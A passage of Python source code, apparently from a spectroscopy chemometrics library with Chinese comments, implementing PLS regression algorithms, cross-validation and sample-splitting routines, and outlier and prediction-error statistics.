# ---- leverage_limit
x_outlier_indices = testset_indices[np.where(leverage > leverage_limit)[0]]
# ---- 计算y_residual的fvalue和fprob
test_y_residual = predict_value - testset_target
y_fvalue = (n_test_samples - 1) * test_y_residual ** 2 / (
sum(square(test_y_residual), axis=0) - test_y_residual ** 2)
y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_test_samples - 1)
y_outlier_indices = testset_indices[np.where(abs(y_fprob) > 0.99)[0]]
# ---- 各种统计量
rmse_statistics = rmse_calc(predict_value, testset_target)
r2 = rmse_statistics['r2']
rmsep = rmse_statistics['rmse']
sep = rmse_statistics['sep'] # A bias corrected version of rmsep
press = rmse_statistics['press']
rpd = rmse_statistics['rpd']
bias = rmse_statistics['bias']
linear_regression_coefficient = rmse_statistics['linear_regression_coefficient']
relative_error = rmse_statistics['relative_error']
# ---- 20190128增加y_tvalue(学生化残差)
prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
y_tvalue = test_y_residual / (rmsep * sqrt(1 - leverage))
# 采用t检验方法确定验证集的预测值与相应的已知参考数据是否有统计意义上的偏差
significant_difference_tvalue = np.abs(bias) * sqrt(n_test_samples) / sep
# 95% sl=0.05 双边检验
significant_difference_critical_value = np.array([sps.t.ppf(0.975, n_test_samples)])
# 配对t检验 paired_test_pvalue > 0.05 则无显著性差异
paired_ttest_statistic, paired_ttest_pvalue = sps.ttest_rel(predict_value, testset_target)
return {'predict_value': predict_value,
'x_scores': test_x_scores,
'leverage': leverage,
't2': t2,
'q': test_q,
'x_residual': test_x_residual,
'fitting_x_list': fitting_x_matrix,
'residual_matrix_list': residual_matrix,
'x_fvalue': x_fvalue,
'x_fprob': x_fprob,
'x_outlier_indices': x_outlier_indices,
'y_fvalue': y_fvalue,
'y_fprob': y_fprob,
'y_tvalue': y_tvalue, # 学生化残差
'y_outlier_indices': y_outlier_indices,
'r2': r2,
'rmsep': rmsep,
'sep': sep,
'press': press,
'rpd': rpd,
'bias': bias,
'linear_regression_coefficient': linear_regression_coefficient,
'relative_error': relative_error,
'significant_difference_tvalue': significant_difference_tvalue,
'significant_difference_critical_value': significant_difference_critical_value,
'paired_ttest_pvalue': paired_ttest_pvalue
}
# +++++++++++++++++++++++++++++++++++++++++++++++ Quantitative Algorithm +++++++++++++++++++++++++++++++++++++++++++++++
def ikpls_algorithm(ab, target, max_nlv):
'''
Improved Kernel Partial Least Squares, IKPLS
:param ab: 光谱吸光度矩阵 (100, 700)
:param target: (100, 1) or (100,)
:param max_nlv:
:return:
b: 回归系数
预测时:dot(ab, pls['b'][:, max_nlv-1] 得到一维数组
预测时:dot(ab, pls['b'][:, max_nlv-1:] 得到二维数组
x_weights: X权重矩阵 w
x_loadings: X载荷矩阵 p
x_scores: X得分矩阵 t
y_loadings: y载荷向量 q
x_scores_weights: X得分矩阵的权重矩阵 r ---- 新样品 T = X r
'''
n_samples, n_variables = ab.shape
if n_samples != target.shape[0]:
raise ValueError('光谱数量与参考值数量不一致!')
if max_nlv > np.min((n_samples, n_variables)):
max_nlv = np.min((n_samples, n_variables))
x_scores = zeros((n_samples, max_nlv))
x_loadings = zeros((n_variables, max_nlv))
y_loadings = zeros((1, max_nlv))
x_weights = zeros((n_variables, max_nlv))
x_scores_weights = zeros((n_variables, max_nlv))
xy = dot(ab.T, target).ravel()
for i in range(max_nlv): # 0,1,2,3,4
w = xy
w = w / sqrt(dot(w.T, w))
r = w
for j in range(i): # i=0时不运行
r = r - dot(x_loadings[:, j], w) * x_scores_weights[:, j]
t = dot(ab, r)
tt = dot(t.T, t)
p = dot(ab.T, t) / tt
q = dot(r.T, xy) / tt
xy = xy - dot(dot(p, q), tt)
x_weights[:, i] = w
x_loadings[:, i] = p
x_scores[:, i] = t
y_loadings[0, i] = q
x_scores_weights[:, i] = r
b = cumsum(dot(x_scores_weights, diag(y_loadings.ravel())), axis=1)
return {'b': b,
'x_scores': x_scores,
'x_loadings': x_loadings,
'y_loadings': y_loadings,
'x_scores_weights': x_scores_weights,
'x_weights': x_weights,
'max_nlv':max_nlv}
def nipals_algorithm(ab, target, max_nlv): # ab(700,700) calset_target(700,1)or(700,) max_nlv(15)
'''
Nonlinear Iterative Partial Least Squares,NIPALS
:param ab:
:param target:
:param max_nlv:
:return:
'''
n_samples, n_variables = ab.shape
if n_samples != target.shape[0]:
raise ValueError('光谱数量与参考值数量不一致!')
if max_nlv > np.min((n_samples, n_variables)):
max_nlv = np.min((n_samples, n_variables))
x_scores = zeros((n_samples, max_nlv)) # (700,15)
x_loadings = zeros((n_variables, max_nlv)) # (700,15)
y_loadings = zeros((1, max_nlv)) # (1,15)
x_weights = zeros((n_variables, max_nlv)) #(700,15)
for i in range(max_nlv):
xy = dot(ab.T, target).ravel()
x_weights[:, i] = xy / norm(xy)
x_scores[:, i] = dot(ab, x_weights[:, i])
x_loadings[:, i] = dot(ab.T, x_scores[:, i]) / dot(x_scores[:, i].T, x_scores[:, i])
y_loadings[0, i] = dot(x_scores[:, i].T, target) / dot(x_scores[:, i].T, x_scores[:, i])
ab = ab - outer(x_scores[:, i], x_loadings[:, i]) #外积,得到矩阵
x_scores_weights = dot(x_weights, inv(dot(x_loadings.T, x_weights)))
b = cumsum(dot(x_scores_weights, diag(y_loadings.ravel())), axis=1) #y_loadings拉成一维数组
return {'b': b, 'x_scores': x_scores, 'x_loadings': x_loadings, 'y_loadings': y_loadings, \
'x_scores_weights': x_scores_weights, 'x_weights': x_weights}
def simpls_algorithm(ab, target, max_nlv):
'''
Straightforward Implementation of a statistically inspired Modification of the Partial Least Squares, SIMPLS
:param ab:
:param target:
:param max_nlv:
:return:
'''
n_samples, n_variables = ab.shape
if np.ndim(target) == 1:
target = target[:, np.newaxis]
if n_samples != target.shape[0]:
raise ValueError('光谱数量与参考值数量不一致!')
if max_nlv > np.min((n_samples, n_variables)):
max_nlv = np.min((n_samples, n_variables))
V = zeros((n_variables, max_nlv))
x_scores = zeros((n_samples, max_nlv)) # X scores (standardized)
x_weights = zeros((n_variables, max_nlv)) # X weights
x_loadings = zeros((n_variables, max_nlv)) # X loadings
y_loadings = zeros((1, max_nlv)) # Y loadings
y_scores = zeros((n_samples, max_nlv)) # Y scores
s = dot(ab.T, target).ravel() # cross-product matrix between the ab and target_data
for i in range(max_nlv):
r = s
t = dot(ab, r)
tt = norm(t)
t = t / tt
r = r / tt
p = dot(ab.T, t)
q = dot(target.T, t)
u = dot(target, q)
v = p # P的正交基
if i > 0:
v = v - dot(V, dot(V.T, p)) # Gram-Schimidt orthogonal
u = u - dot(x_scores, dot(x_scores.T, u))
v = v / norm(v)
s = s - dot(v, dot(v.T, s))
x_weights[:, i] = r
x_scores[:, i] = t
x_loadings[:, i] = p
y_loadings[:, i] = q
y_scores[:, i] = u
V[:, i] = v
b = cumsum(dot(x_weights, diag(y_loadings.ravel())), axis=1)
return {'b': b, 'x_scores': x_scores, 'x_loadings': x_loadings, 'y_loadings': y_loadings, \
'x_scores_weights': x_weights, 'x_weights': x_weights, 'y_scores':y_scores}
# +++++++++++++++++++++++++++++++++++++++++++++++ Sampling Algorithm +++++++++++++++++++++++++++++++++++++++++++++++
# Note: All the sampling indices should be sorted, using np.sort()
def cv_kfold_random_sampling(n_population, kfold=9, seed=999):
'''
The first ``n % kfold`` folds have size ``n // kfold + 1``,
other folds have size ``n // kfold``, where ``n`` is the number of samples.
'''
train_indices_list = []
test_indices_list = []
rng = np.random.RandomState(seed)
fold_sizes = (n_population // kfold) * np.ones(kfold, dtype=np.int) # other folds
fold_sizes[:n_population % kfold] += 1 # background 'n % kfold' folds
population_indices = np.arange(n_population) # 83
for i in range(kfold):
mask = zeros(n_population, dtype=np.bool)
test_indices = rng.choice(population_indices, fold_sizes[i], replace=False)
mask[test_indices] = True # 选中的标记True
train_indices = np.arange(n_population)[~mask] # 用于训练集
test_indices_list.append(test_indices)
train_indices_list.append(train_indices)
return train_indices_list, test_indices_list
def cv_kfold_systematic_sampling(n_population, kfold=9):
'''
前面的mod折数量多, 后面的折数量少
The first ``n % kfold`` folds have size ``n // kfold + 1``,
other folds have size ``n // kfold``, where ``n`` is the number of samples.
'''
train_indices_list = []
test_indices_list = []
fold_sizes = ((n_population // kfold) + 1 ) * np.ones(kfold, dtype=np.int)
fold_sizes[n_population % kfold:] -= 1
for i in range(kfold):
mask = zeros(n_population, dtype=np.bool)
test_indices = np.linspace(start=i, stop=kfold*(fold_sizes[i] - 1) + i, num=fold_sizes[i], dtype=int)
test_indices_list.append(test_indices)
mask[test_indices] = True
train_indices = np.arange(n_population)[~mask]
train_indices_list.append(train_indices)
return train_indices_list, test_indices_list
def cv_lpo_random_sampling(n_population, p=3, seed=999):
'''
保证前面的 n // p 折数量是p, 最后一折数量是 n % p
The last fold have size ``n % p``, other folds have size ``p``
'''
kfold = (n_population + p -1) // p # 向上取整 等价于 math.ceil(n_population / p)
mod = n_population % p
if mod == 0:
kfold = n_population // p
fold_sizes = p * np.ones(kfold, dtype=np.int)
else:
kfold = n_population // p + 1
fold_sizes = p * np.ones(kfold, dtype=np.int)
fold_sizes[-1] = mod
train_indices_list = []
test_indices_list = []
rng = np.random.RandomState(seed)
population_indices = np.arange(n_population) # 83
temp_left_indices = population_indices
for i in range(kfold):
test_indices = rng.choice(temp_left_indices, fold_sizes[i], replace=False)
train_indices = np.setdiff1d(population_indices, test_indices) # 用于训练集
test_indices_list.append(test_indices)
train_indices_list.append(train_indices)
temp_left_indices = np.setdiff1d(temp_left_indices, test_indices)
return train_indices_list, test_indices_list
def cv_lpo_systematic_sampling(n_population, p=3):
'''
Leave p Out:系统采样作为取出P个样本的依据; 内部交叉验证从第一个开始取出作为验证集(0, 5, 10 ... )
:param n_population:
:param p:
:return:
'''
population_indices = np.arange(n_population, dtype=int)
train_indices_list = []
test_indices_list = []
mod = n_population % p
# ================ 能整除 ================
if mod == 0: # 能整除
kfold = n_population // p
interval = n_population // p
fold_sizes = p * np.ones(kfold, dtype=np.int)
for i in range(kfold):
test_indices = np.linspace(start=i, stop=(fold_sizes[i] - 1) * interval + i, num=fold_sizes[i], dtype=int)
test_indices_list.append(test_indices)
train_indices = np.setdiff1d(population_indices, test_indices)
train_indices_list.append(train_indices)
# ================ 不能整除 ================
else: # 不能整除
kfold = n_population // p + 1
interval = n_population // p
fold_sizes = p * np.ones(kfold, dtype=np.int)
fold_sizes[-1] = mod # 最后一折个数为余数 14 % 4 = 2
# ---------------- 处理前(kfold - 1)折 ----------------
for i in range(kfold - 1):
test_indices = np.linspace(start=i, stop=(fold_sizes[i] - 1) * interval + i, num=fold_sizes[i], dtype=int)
test_indices_list.append(test_indices)
train_indices = np.setdiff1d(population_indices, test_indices)
train_indices_list.append(train_indices)
# ---------------- 处理最后一折 ----------------
last_fold_test_indices = population_indices[-mod:]
last_fold_train_indices = np.setdiff1d(population_indices, last_fold_test_indices)
# ---------------- 合并最后一折 ----------------
test_indices_list.append(last_fold_test_indices)
train_indices_list.append(last_fold_train_indices)
return train_indices_list, test_indices_list
def montecarlo_sampling(n_population, test_size=0.2, seed=999):
'''
用于蒙特卡洛采样,原理是随机采样
:param n_population:
:param test_size:
:param seed:
:return:
'''
rng = np.random.RandomState(seed)
n_test = int(n_population * test_size) # 81*0.2=16
# n_train = n - n_test
mask = zeros(n_population, dtype=np.bool)
a = np.arange(n_population)
rng.shuffle(a)
test_indices = rng.choice(a, n_test, replace=False)
test_indices.sort()
mask[test_indices] = True
train_indices = np.arange(n_population)[~mask]
# ================ 重新排序 ================
train_indices.sort()
test_indices.sort()
return train_indices, test_indices
def ks_sampling(X, p=3, population_indices=None):
'''
用于ks抽样,返回指定样品数目的索引号(因为依次取出样品的顺序有内在特性,不再排序)
:param X: 针对吸光度矩阵
:param p:
:param population_indices:
:return:
'''
n_samples, n_variables = X.shape
if population_indices is None:
population_indices = np.arange(n_samples)
D = squareform(pdist(X, metric='euclidean'))
temp_index = []
index_2max = where(D == D.max())[0]
temp_index.append(index_2max[0])
temp_index.append(index_2max[1])
retained_D = D[:, temp_index]
retained_D[temp_index, :] = 0
for k in range(p - 2):
choice_index = where(retained_D == max(min(retained_D, axis=1, keepdims=True)))[0][0]
temp_index.append(choice_index)
retained_D = D[:, temp_index]
retained_D[temp_index, :] = 0
train_indices = np.sort(population_indices[temp_index])
test_indices = np.setdiff1d(population_indices, train_indices)
return train_indices, test_indices
def spxy_sampling(X, y, p=3, population_indices=None):
'''
用于SPXY抽样, 返回指定样品数目的索引号(因为依次取出样品的顺序有内在特性,不再排序)
:param X:
:param y:
:param p:
:param population_indices:
:return:
'''
n_samples, n_variables = X.shape
if y.ndim == 1:
y = y[:, np.newaxis]
if population_indices is None:
population_indices = np.arange(n_samples)
# ----------- 光谱距离计算 -----------
D_ab = zeros((n_samples, n_samples))
for i in range(n_samples - 1):
for j in range(i+1, n_samples):
D_ab[i, j] = norm(X[i, :]-X[j, :])
D_ab += D_ab.T
D_ab_max = np.max(D_ab)
# ----------- 浓度距离计算 -----------
D_con = zeros((n_samples, n_samples))
for i in range(n_samples - 1):
for j in range(i+1, n_samples):
D_con[i, j] = norm(y[i, :]-y[j, :])
D_con += D_con.T
D_con_max = np.max(D_con)
# ----------- 光谱&浓度距离 -----------
D = D_ab / D_ab_max + D_con / D_con_max
# ----------- 抽样 -----------
temp_index = []
index_2max = where(D == D.max())[0]
temp_index.append(index_2max[0])
temp_index.append(index_2max[1])
retained_D = D[:, temp_index]
retained_D[temp_index, :] = 0
for k in range(p - 2):
choice_index = where(retained_D == max(min(retained_D, axis=1, keepdims=True)))[0][0]
temp_index.append(choice_index)
retained_D = D[:, temp_index]
retained_D[temp_index, :] = 0
cal_indices = population_indices[temp_index]
val_indices = np.setdiff1d(population_indices, cal_indices)
return cal_indices, val_indices
def samples_systematic_split(X, val_size=0.1, test_size=0, population_indices=None):
'''
系统采样原理
:param X: Absorbance
:param n_population:
:param val_size:
:param test_size:
:return:
'''
n_population = X.shape[0]
if (val_size + test_size) >= 1.0:
raise ValueError('Wrong parameters of the sampling ratio!')
n_val = int(n_population * val_size)
n_test = int(n_population * test_size)
n_train = n_population - n_val - n_test
n_val_test = n_val + n_test
if population_indices is None:
population_indices = np.arange(n_population)
# -------------- 先挑选 val_test_set,同分布 --------------
interval_1 = n_population // n_val_test # 有
if interval_1 > 1:
val_test_indices = np.array([population_indices[interval_1 * i - 1] for i in range(1, n_val_test+1)])
elif interval_1 == 1: # 不够等距采样
val_test_indices_first = np.array([population_indices[2 * i - 1] for i in range(1, n_population//2 + 1)])
val_test_indices_last = np.array([population_indices[2 * i] for i in range(1, n_val_test - n_population//2 + 1)])
val_test_indices = np.hstack((val_test_indices_first, val_test_indices_last))
train_indices = np.setdiff1d(population_indices, val_test_indices)
if n_test == 0:
val_indices = val_test_indices
test_indices = np.setdiff1d(val_test_indices, val_indices)
elif n_val == 0:
test_indices = val_test_indices
val_indices = np.setdiff1d(val_test_indices, test_indices)
# -------------- 再从val_test_set中挑选valset,同分布 --------------
else:
interval_2 = n_val_test // n_val # 先挑选出 valset
if interval_2 > 1:
val_indices = np.array([val_test_indices[interval_2 * j - 1] for j in range(1, n_val + 1)])
elif interval_2 == 1:
val_indices_first = np.array([val_test_indices[2 * j - 1] for j in range(1, n_val_test//2 + 1)])
val_indices_last = np.array([val_test_indices[2 * j] for j in range(1, n_val - n_val_test // 2 + 1)])
val_indices = np.hstack((val_indices_first, val_indices_last))
test_indices = np.setdiff1d(val_test_indices, val_indices)
# ================ 重新排序 ================
train_indices.sort()
val_indices.sort()
test_indices.sort()
return train_indices, val_indices, test_indices
def samples_ks_split(X, val_size=0.1, test_size=0.1, population_indices=None):
'''
样品划分,Kennard-Stone原理
:param X: Absorbance
:param val_size:
:param test_size:
:param population_indices:
:return:
'''
n_population = X.shape[0]
if (val_size + test_size) >= 1.0:
raise ValueError('Wrong parameters of the sampling ratio!')
n_val = int(n_population * val_size)
n_test = int(n_population * test_size)
n_train = n_population - n_val - n_test
if population_indices is None:
population_indices = np.arange(n_population)
# 先挑选trainset
train_indices, val_test_indices = ks_sampling(X, n_train, population_indices=population_indices)
val_test_set = X[val_test_indices, :]
if n_test == 0:
val_indices = val_test_indices
test_indices = np.setdiff1d(val_test_indices, val_indices)
elif n_val == 0:
test_indices = val_test_indices
val_indices = np.setdiff1d(val_test_indices, test_indices)
else:
# 再挑选valset
val_indices, test_indices = ks_sampling(val_test_set, n_val, population_indices=val_test_indices)
# ================ 重新排序 ================
train_indices.sort()
val_indices.sort()
test_indices.sort()
return train_indices, val_indices, test_indices
def samples_spxy_split(X, target, val_size=0.1, test_size=0.1, population_indices=None):
'''
样品划分,基于指定的target
:param X: Absorbance
:param target:
:param val_size:
:param test_size:
:param population_indices:
:return:
'''
if target.ndim == 1:
target = target[:, np.newaxis]
n_population = X.shape[0]
if (val_size + test_size) >= 1.0:
raise ValueError('Wrong parameters of the sampling ratio!')
n_val = int(n_population * val_size)
n_test = int(n_population * test_size)
n_train = n_population - n_val - n_test
if population_indices is None:
population_indices = np.arange(n_population)
# 先挑选trainset
train_indices, val_test_indices = spxy_sampling(X, target,
n_train, population_indices=population_indices)
val_test_set_ab = X[val_test_indices, :]
val_test_set_con = target[val_test_indices, :]
if n_test == 0:
val_indices = val_test_indices
test_indices = np.setdiff1d(val_test_indices, val_indices)
elif n_val == 0:
test_indices = val_test_indices
val_indices = np.setdiff1d(val_test_indices, test_indices)
else:
# 再挑选valset
val_indices, test_indices = spxy_sampling(val_test_set_ab, val_test_set_con,
n_val, population_indices=val_test_indices)
# ================ 重新排序 ================
train_indices.sort()
val_indices.sort()
test_indices.sort()
return train_indices, val_indices, test_indices
def samples_random_split(X, val_size=0.1, test_size=0.1, seed=999, population_indices=None):
'''
:param X: Absorbance
:param val_size:
:param test_size:
:param seed:
:param population_indices:
:return:
'''
rng = np.random.RandomState(seed)
n_population = X.shape[0]
if (val_size + test_size) >= 1.0:
raise ValueError('Wrong parameters of the sampling ratio!')
n_val = int(n_population * val_size)
n_test = int(n_population * test_size)
n_train = n_population - n_val - n_test
if population_indices is None:
population_indices = np.arange(n_population)
train_indices = population_indices[rng.choice(n_population, n_train, replace=False)]
val_test_indices = np.setdiff1d(population_indices, train_indices)
val_indices = val_test_indices[rng.choice(n_val + n_test, n_val, replace=False)]
test_indices = np.setdiff1d(val_test_indices, val_indices)
# ================ 重新排序 ================
train_indices.sort()
val_indices.sort()
test_indices.sort()
return train_indices, val_indices, test_indices
# +++++++++++++++++++++++++++++++++++++++++++++++ Utilities +++++++++++++++++++++++++++++++++++++++++++++++
class PLSR(object):
'''
用于 PLS Regression,指定PLS算法、最大潜变量数
必要输入参数包括:吸光度矩阵、参考值
可以实现:校正、预测(所有光谱必须事先兼容)
'''
def __init__(self, algorithm='ikpls_algorithm', max_nlv=10):
self.algorithm = algorithm
self.max_nlv = max_nlv
return
def fit(self, cal_spec, cal_target):
'''
PLS 回归得到 b, x_scores, x_loadings, y_loadings, x_scores_weights, x_weights, max_nlv
:param cal_ab: 使用pretreat.ConstructCompatiblePLSBand().fit_construct生成
:param cal_target:
:return:
'''
if cal_target.ndim == 1:
cal_target = cal_target[:, np.newaxis] # 用于多维结果的broadcast计算
cal_ab = cal_spec[1:, :]
# --------- 处理维数过大的问题 ---------
if self.max_nlv > np.min((cal_ab.shape[0], cal_ab.shape[1])):
self.max_nlv = np.min((cal_ab.shape[0], cal_ab.shape[1]))
# --------- PLS回归 ---------
self.pls_result = eval(self.algorithm)(cal_ab, cal_target, self.max_nlv)
return self
def fit_predict(self, cal_spec, cal_target):
cal_ab = cal_spec[1:, :]
self.model_ab = cal_ab
if cal_target.ndim == 1:
cal_target = cal_target[:, np.newaxis] # 用于多维结果的broadcast计算
self.fit(cal_spec, cal_target)
# pls_result由ikpls_algorithm算法给出以下数据:
# b, x_scores, x_loadings, y_loadings, x_scores_weights, x_weights, max_nlv
b = self.pls_result['b']
calx_scores = self.pls_result['x_scores']
calx_loadings = self.pls_result['x_loadings']
calx_scores_weights = self.pls_result['x_scores_weights']
fit_value = dot(cal_ab, b) # 全部维的结果
pls_calibration_model = {'b':b,
'fit_value': fit_value,
'algorithm': self.algorithm,
'max_nlv': self.max_nlv,
'pls_result': self.pls_result,
'x_loadings': calx_loadings,
'x_scores': calx_scores,
'x_scores_weights':calx_scores_weights,
'model_ab': self.model_ab}
return {'b':b,
'fit_value': fit_value,
'algorithm': self.algorithm,
'max_nlv': self.max_nlv,
'pls_result': self.pls_result,
'x_loadings': calx_loadings,
'x_scores_weights': calx_scores_weights,
'x_scores': calx_scores,
'model_ab': self.model_ab,
'pls_calibration_model': pls_calibration_model}
def val_predict(self, val_spec):
'''
调用当前实例中校正集校正的结果
既可以用于不含浓度的样品的预测,也可以用于验证集验证
:param val_ab: numpy.ndarray
:return:
'''
val_ab = val_spec[1:, :]
b = self.pls_result['b']
# 计算
predict_value = dot(val_ab, b)
return {'predict_value':predict_value}
def q_calc(calx_loadings, scores, pretreated_data):
'''
Usually the statistic Q, also called squared prediction error(SPE),
and the Hotelling's T^2 statistic are used to represent the variability in the residual subspace
and principal component subspace
For PCAValidation: pretreated_data
For PLS: pretreated_ab
:param calx_loadings: 校正模型的 x_loadings
:param scores: 待计算样本的 scores
:param pretreated_data: 待计算样本处理之后的进入pca/pls算法的数据
:return: q、残差矩阵列表、拟合光谱矩阵列表
'''
if calx_loadings.ndim == 1:
calx_loadings = calx_loadings[:, np.newaxis] # 如果一维数组,增加至二维数组
if scores.ndim == 1:
scores = scores[:, np.newaxis] # 如果一维数组,增加至二维数组
if pretreated_data.ndim == 1:
pretreated_data = pretreated_data[:, np.newaxis] # 如果一维数组,增加至二维数组
n_samples, n_lv = scores.shape
n_variables = calx_loadings.shape[0]
q = zeros((n_samples, n_lv)) # Sometimes referred to as the Squared Prediction Error (SPE)
f_residuals = zeros((n_samples, n_lv))
residual_matrix_list = []
fitting_x_list = []
x_variable_residuals = zeros((n_variables, n_lv)) # (n_variables, n_lv)
x_sample_residuals = zeros((n_samples, n_lv))
for i in range(n_lv): # 0:5 nlv
# Q
fitting_x_lv = dot(scores[:, :i + 1], calx_loadings[:, :i + 1].T)
residual_matrix_lv = pretreated_data - fitting_x_lv
residual_matrix_list.append(residual_matrix_lv)
fitting_x_list.append(fitting_x_lv)
q_lv = np.sum(residual_matrix_lv ** 2, axis=1)
f_residuals_lv = sqrt(np.mean(residual_matrix_lv ** 2, axis=1))
q[:, i] = q_lv
f_residuals[:, i] = f_residuals_lv
x_sample_residuals[:, i] = np.sum(residual_matrix_lv ** 2, axis=1) / n_variables
x_variable_residuals[:, i] = np.sum(residual_matrix_lv ** 2, axis=0) / n_samples
x_total_residuals = np.mean(x_variable_residuals, axis=0, keepdims=True) # (1, n_lv)
explained_x_sample_variance = (1 - x_sample_residuals / (np.sum(pretreated_data ** 2, axis=1, keepdims=True) / \
n_variables)) * 100
explained_x_variable_variance = (1-x_variable_residuals.T / (np.sum(pretreated_data ** 2, axis=0)/n_samples)) * 100
explained_x_total_variance = (1 - x_total_residuals / np.mean(pretreated_data ** 2)) * 100
explained_x_variance_ratio = np.hstack((explained_x_total_variance[:, 0:1], np.diff(explained_x_total_variance)))
return {'q':q,
'f_residuals': f_residuals,
'residual_matrix_list':residual_matrix_list,
'fitting_x_list':fitting_x_list,
'x_sample_residuals': x_sample_residuals,
'x_variable_residuals':x_variable_residuals,
'x_total_residuals': x_total_residuals,
'explained_x_sample_variance': explained_x_sample_variance,
'explained_x_variable_variance': explained_x_variable_variance.T,
'explained_x_total_variance': explained_x_total_variance,
'explained_x_variance_ratio': explained_x_variance_ratio
}
def q_calc_cv(calx_loadings, scores, pretreated_data):
'''
Usually the statistic Q, also called squared prediction error(SPE),
and the Hotelling's T^2 statistic are used to represent the variability in the residual subspace
and principal component subspace
For PCAValidation: pretreated_data
For PLS: pretreated_ab
:param calx_loadings: 校正模型的 x_loadings
:param scores: 待计算样本的 scores
:param pretreated_data: 待计算样本处理之后的进入pca/pls算法的数据
:return: q、残差矩阵列表、拟合光谱矩阵列表
'''
if calx_loadings.ndim == 1:
calx_loadings = calx_loadings[:, np.newaxis] # 如果一维数组,增加至二维数组
if scores.ndim == 1:
scores = scores[:, np.newaxis] # 如果一维数组,增加至二维数组
if pretreated_data.ndim == 1:
pretreated_data = pretreated_data[:, np.newaxis] # 如果一维数组,增加至二维数组
n_samples, n_lv = scores.shape
# n_variables = calx_loadings.shape[0]
q = zeros((n_samples, n_lv)) # Sometimes referred to as the Squared Prediction Error (SPE)
residual_matrix_list = []
fitting_x_list = []
for i in range(n_lv): # 0:5 nlv
# Q
fitting_x_lv = dot(scores[:, :i + 1], calx_loadings[:, :i + 1].T)
residual_matrix_lv = pretreated_data - fitting_x_lv
residual_matrix_list.append(residual_matrix_lv)
fitting_x_list.append(fitting_x_lv)
q_lv = np.sum(residual_matrix_lv ** 2, axis=1)
q[:, i] = q_lv
return {'q':q,
'residual_matrix_list':residual_matrix_list,
'fitting_x_list':fitting_x_list}
def leverage_t2_calc(scores, calx_scores):
'''
Leverage & Hotelling T2
:param scores: 待计算样本的 scores
:param calx_scores: 校正模型样本的 x_scores
:return: t2
'''
if scores.ndim == 1:
scores = scores[:, np.newaxis] # 如果一维数组,增加至二维数组
if calx_scores.ndim == 1:
calx_scores = calx_scores[:, np.newaxis] # 如果一维数组,增加至二维数组
n_cal_samples = calx_scores.shape[0]
leverage = zeros((scores.shape[0], scores.shape[1]))
for i in range(scores.shape[1]): # 0:5 nlv
lev_lv = diag(dot(dot(scores[:, :i + 1], inv(dot(calx_scores[:, :i + 1].T, calx_scores[:, :i + 1]))),
scores[:, :i + 1].T)) + 1 / n_cal_samples
leverage[:, i] = lev_lv
t2 = (n_cal_samples - 1) * (leverage - 1 / n_cal_samples)
return {'leverage': leverage, 't2': t2}
def leverage_t2_calc_cv(cv_x_scores, calx_scores):
'''
Leverage & Hotelling T2 For Cross Validation
:param cv_x_scores: 验证完成后全体样本的 scores
:param calx_scores: 全体校正样本的 x_scores
:return: t2
'''
if cv_x_scores.ndim == 1:
cv_x_scores = cv_x_scores[:, np.newaxis] # 如果一维数组,增加至二维数组
if calx_scores.ndim == 1:
calx_scores = calx_scores[:, np.newaxis] # 如果一维数组,增加至二维数组
n_cal_samples = calx_scores.shape[0]
leverage = zeros((cv_x_scores.shape[0], cv_x_scores.shape[1]))
for i in range(cv_x_scores.shape[1]): # 0:5 nlv
lev_lv = diag(dot(dot(cv_x_scores[:, :i + 1], inv(dot(calx_scores[:, :i + 1].T, calx_scores[:, :i + 1]))),
cv_x_scores[:, :i + 1].T)) + 1 / n_cal_samples
leverage[:, i] = lev_lv
t2 = (n_cal_samples - 1) * leverage
return {'leverage': leverage, 't2': t2}
def outlier_detect(sample_leverage, leverage_limit, y_fprob, sample_indices=None):
'''
X-direction: > 3 * mean(cal_leverage)
y-direction: F distribution fprob > 0.99
:param sample_leverage: 二维 61 * 20 nlv
:param leverage_limit: 1维 (20,)
:param
:return:
'''
if sample_leverage.ndim == 1:
sample_leverage = sample_leverage[:, np.newaxis]
if y_fprob.ndim == 1:
y_fprob = y_fprob[:, np.newaxis]
if sample_indices is None:
temp_indices = np.arange(sample_leverage.shape[0])
else:
temp_indices = sample_indices
# X direction: > 3 * mean(leverage, axis=0)
x_outlier_indices_list = [] # 有10个潜变量数
leverage_limit = leverage_limit # (max_ncomp,)
for i in range(sample_leverage.shape[1]): # 0 : max_ncomp-1
x_outlier_indices = temp_indices[np.where(sample_leverage[:, i] > leverage_limit[i])[0]]
x_outlier_indices_list.append(x_outlier_indices)
# y direction:
y_outlier_indices_list = []
for i in range(sample_leverage.shape[1]): # 不同潜变量数
y_outlier_indices = temp_indices[np.where(abs(y_fprob[:, i].ravel()) > 0.99)[0]]
y_outlier_indices_list.append(y_outlier_indices)
just_x_outlier_list = []
just_y_outlier_list = []
both_xy_outlier_list = []
for k in range(sample_leverage.shape[1]):
x_idx = x_outlier_indices_list[k]
y_idx = y_outlier_indices_list[k]
both_xy_outlier = np.intersect1d(x_idx, y_idx)
just_x_outlier = np.setdiff1d(x_idx, both_xy_outlier)
just_y_outlier = np.setdiff1d(y_idx, both_xy_outlier)
just_x_outlier_list.append(just_x_outlier)
just_y_outlier_list.append(just_y_outlier)
both_xy_outlier_list.append(both_xy_outlier)
return {'x_outlier_indices_list': x_outlier_indices_list,
'y_outlier_indices_list': y_outlier_indices_list,
'just_x_outlier_list': just_x_outlier_list,
'just_y_outlier_list': just_y_outlier_list,
'both_xy_outlier_list': both_xy_outlier_list
}
def rmse_calc(predict_value, reference_value):
'''
只能用于内部交叉验证和预测
:param predict_value:
:param reference_value:
:return:
'''
if predict_value.ndim == 1:
predict_value = predict_value[:, np.newaxis] # 如果一维数组,增加至二维数组
if reference_value.ndim == 1:
reference_value = reference_value[:, np.newaxis] # 如果一维数组,增加至二维数组
max_nlv = predict_value.shape[1]
n_samples = reference_value.shape[0]
error = predict_value - reference_value
press = np.sum(error * error, axis=0) # Error Sum of Squares(SSE)
rmse = sqrt(press / n_samples)
sst = np.sum((reference_value - mean(reference_value)) ** 2) # Total Sum Of Squares(SST) 总离差平方和
ssr = np.sum((predict_value - mean(reference_value)) ** 2, axis=0) # Regression Sum of Squares(SSR)
r2 = 1 - press / sst
sd = sqrt(sst / (n_samples - 1))
bias = np.mean(error, axis=0) # 也可以叫验证平均误差
# refer to OPUS
# SEP (Standard Error of Prediction)
SEP = sqrt((np.sum((error - bias) * (error - bias), axis=0)) / (n_samples - 1))
rpd = sd / SEP
# # correlation coefficient
# fit_value_mc = predict_value - mean(predict_value, axis=0)
# reference_value_mc = reference_value - mean(reference_value, axis=0)
# corr_coeff_numerator = np.sum(fit_value_mc * reference_value_mc, axis=0)
